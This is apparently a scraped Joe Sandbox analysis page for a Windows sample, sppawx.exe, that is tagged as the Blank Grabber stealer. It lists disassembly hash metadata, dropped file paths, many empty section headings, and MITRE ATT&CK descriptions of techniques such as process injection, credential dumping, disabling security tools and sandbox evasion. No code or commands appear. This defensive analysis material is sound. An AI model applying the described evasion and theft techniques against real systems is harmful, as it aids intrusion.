API ID: CloseCreateEventHandle$ErrorLast
String ID: rar -ioff
API String ID: 4151682896-4089728129
Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction ID: a50389ff9f3b7e970a6ed6c6b00b31f963111cf1779f34f232ff0567a29aac29
Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
Instruction Fuzzy Hash: 99014B64E99A0782FF34DFB0AC546352351BF49F02F540435EC4EC6AB4CE3C6C888662

Function 00007FF62571C654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction ID: f8598e08543d0e13357f4723899e484daa4577dc78bee8ec21109e4eb2a34696
Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction Fuzzy Hash: C3A1F672B4878286FF708FA088643B966D9AF40FA4F588635DA5D867C5DF7CEC449302

Function 00007FF625715630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF62570F3FC,?,?,?,00007FF62571143D), ref: 00007FF62571563A
SetLastError.KERNEL32(?,?,?,00007FF62570F3FC,?,?,?,00007FF62571143D), ref: 00007FF6257156A2
SetLastError.KERNEL32(?,?,?,00007FF62570F3FC,?,?,?,00007FF62571143D), ref: 00007FF6257156B8
abort.LIBCMT ref: 00007FF6257156BE

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction ID: df3f8e7ade410ee29522459d3c9160ac857cff35fcc666301ea830df9eacfa33
Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
Instruction Fuzzy Hash: 2F019E20B8920242FE7CAF30AE7927C51925F48F90F048538D91EC6BD6ED2DBC014A52

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sppawx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

C:\Users\user\AppData\Local\Temp\7VKXZ.zip

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\RESA7D9.tmp

C:\Users\user\AppData\Local\Temp\_MEI78082\VCRUNTIME140.dll

C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pyd

C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pyd

Windows Analysis Report
sppawx.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre